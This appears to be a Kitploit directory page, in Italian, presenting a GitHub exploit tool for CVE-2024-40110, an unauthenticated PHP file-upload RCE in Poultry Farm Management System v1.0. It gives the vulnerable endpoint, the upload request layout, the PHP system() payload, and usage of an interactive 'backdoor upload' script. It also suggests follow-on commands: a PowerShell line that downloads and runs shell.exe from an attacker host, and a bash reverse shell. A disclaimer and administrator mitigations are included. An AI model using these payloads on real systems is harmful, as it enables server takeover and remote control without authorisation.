Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-40110 — Exploit per CVE-2024-40110, un upload di file non autenticato RCE in Poultry Farm Management System v1.0. Carica una shell PHP per eseguire comandi arbitrari sul target. | Kitploit
Strumenti/GitHubGitHub/angry-althaf/cve-2024-40110
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubangry-althaf/cve-2024-40110

CVE-2024-40110

Exploit per CVE-2024-40110, un upload di file non autenticato RCE in Poultry Farm Management System v1.0. Carica una shell PHP per eseguire comandi arbitrari sul target.

Vedi Repository
18 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Sistema di Gestione Allevamento Avicolo v1.0 - Exploit RCE

Tipo di Vulnerabilità

Caricamento file non autenticato con esecuzione remota di codice

Descrizione

Il Sistema di Gestione Allevamento Avicolo v1.0 contiene una vulnerabilità critica nella funzionalità di caricamento dei prodotti. L'applicazione non convalida e non sanifica adeguatamente i caricamenti di file, consentendo agli attaccanti di caricare file PHP camuffati da immagini di prodotto. Questi file PHP caricati possono essere eseguiti per ottenere l'esecuzione remota di codice.

Endpoint Vulnerabile

root@kitploit:~
POST /paultry/farm/product.php o POST /farm/product.php

Vettore d'Attacco

La vulnerabilità può essere sfruttata attraverso:

  1. L'invio di una richiesta POST all'endpoint di caricamento del prodotto
  2. Il caricamento di un file PHP shell con comandi arbitrari
  3. L'accesso al file caricato per eseguire i comandi incorporati

Requisiti

Prerequisiti

  • Python 3.7+
  • Libreria requests
  • Libreria colorama (per output colorato)
  • Accesso di rete al target vulnerabile

Installazione

root@kitploit:~
pip install requests colorama

Oppure installa tutte le dipendenze:

root@kitploit:~
pip install -r requirements.txt

Utilizzo

Utilizzo Base

Esegui lo script in modo interattivo:

root@kitploit:~
python exploit.py

Lo script ti chiederà:

  1. Indirizzo IP del Target - L'indirizzo IP del server vulnerabile
  2. Porta del Target - Il numero di porta (default: 80)
  3. Comando da Eseguire - Il comando di sistema da eseguire sul target

Esempio

root@kitploit:~
==================================================
Strumento Interattivo per il Caricamento di Backdoor
==================================================

Inserisci l'indirizzo IP del target: 192.168.1.100
Inserisci la porta del target (default: 80): 8080
Inserisci il comando da eseguire (default: payload powershell):
Comando: whoami

==================================================
CONFERMA
==================================================
URL target: http://192.168.1.100:8080
Comando: whoami
Vuoi procedere? (sì/no): sì

Funzionalità

✅ Input Interattivo - Richiede IP, porta e comandi personalizzati
✅ Valori Predefiniti - Default sensati per comodità
✅ Output Colorato - Output terminale colorato facile da leggere
✅ Passaggio di Conferma - Verifica le impostazioni prima dell'esecuzione
✅ Gestione Errori - Messaggi di errore chiari per richieste fallite
✅ Comandi Flessibili - Supporto per qualsiasi comando shell o payload PowerShell

Comandi Comuni

Target Windows

root@kitploit:~
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"

Target Linux

root@kitploit:~
bash -i >& /dev/tcp/attacker-ip/4444 0>&1

Raccolta Informazioni

root@kitploit:~
whoami
id
ifconfig
hostname
pwd

Dettagli Tecnici

Come Funziona

  1. Caricamento File: Invia una richiesta POST con payload PHP incorporato come file
  2. Esecuzione Payload: Il file PHP caricato viene salvato in /assets/img/productimages/
  3. Esecuzione Comandi: L'accesso al file PHP attiva l'esecuzione del comando tramite la funzione system()
  4. Recupero Output: Lo script recupera l'output tramite richiesta GET

Struttura della Richiesta

root@kitploit:~
POST /paultry/farm/product.php
Content-Type: multipart/form-data

category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]

Formato del Payload

root@kitploit:~
<?php system('COMANDO_QUI');?>

Ambiente di Test

L'exploit è stato testato su:

  • SO: Windows 10
  • Server: XAMPP v3.3.0
  • Versione PHP: Compatibile con PHP 5.6+

Disclaimer

⚠️ AVVISO LEGALE

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale.

  • Utilizzare questo exploit solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per i test
  • Gli autori declinano ogni responsabilità per uso improprio o danni causati da questo strumento
  • Gli utenti sono responsabili di garantire la conformità a tutte le leggi e normative applicabili
  • L'accesso, la modifica o l'interruzione non autorizzata di sistemi informatici costituisce reato federale ai sensi del Computer Fraud and Abuse Act (CFAA) e di leggi simili a livello mondiale

Mitigazione

Per gli Amministratori

  1. Aggiornamento Software - Applicare patch di sicurezza se disponibili

  2. Validazione dei Caricamenti File

    • Validare le estensioni dei file (whitelist: jpg, png, gif, ecc.)
    • Controllare i tipi MIME lato server
    • Archiviare i file caricati al di fuori della directory web root
    • Disabilitare l'esecuzione di script nelle directory di upload
  3. Configurazione

    root@kitploit:~
    <Directory /uploads>
        php_flag engine off
        AddType text/plain .php .phtml .php3 .php4 .php5 .phar
    </Directory>
    
  4. Controllo Accessi

    • Implementare l'autenticazione prima di consentire i caricamenti
    • Validare i permessi degli utenti
    • Aggiungere limitazione di frequenza
  5. Monitoraggio

    • Monitorare le directory di upload per file sospetti
    • Registrare tutti i tentativi di upload
    • Implementare il controllo dell'integrità dei file

Riferimenti

  • Exploit DB: https://www.exploit-db.com/exploits/52053
  • GitHub: https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
  • Software Originale: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Risoluzione dei Problemi

Connessione Rifiutata

root@kitploit:~
Errore: Connessione rifiutata
Soluzione: Verificare che l'indirizzo IP e la porta del target siano corretti e che l'applicazione sia in esecuzione

404 Non Trovato

root@kitploit:~
Errore: Caricamento shell fallito. Codice di stato: 404
Soluzione: Il percorso dell'endpoint potrebbe differire. Percorsi comuni: /farm/, /paultry/farm/

PHP Non Eseguito

root@kitploit:~
Errore: Output del comando vuoto
Soluzione: L'esecuzione PHP potrebbe essere disabilitata o il file non è stato caricato correttamente

Supporto

Per problemi, domande o miglioramenti, fare riferimento al repository GitHub o alla pagina Exploit-DB.


Ultimo aggiornamento: Dicembre 2024
Stato: Verificato e testato

Scarica lo strumento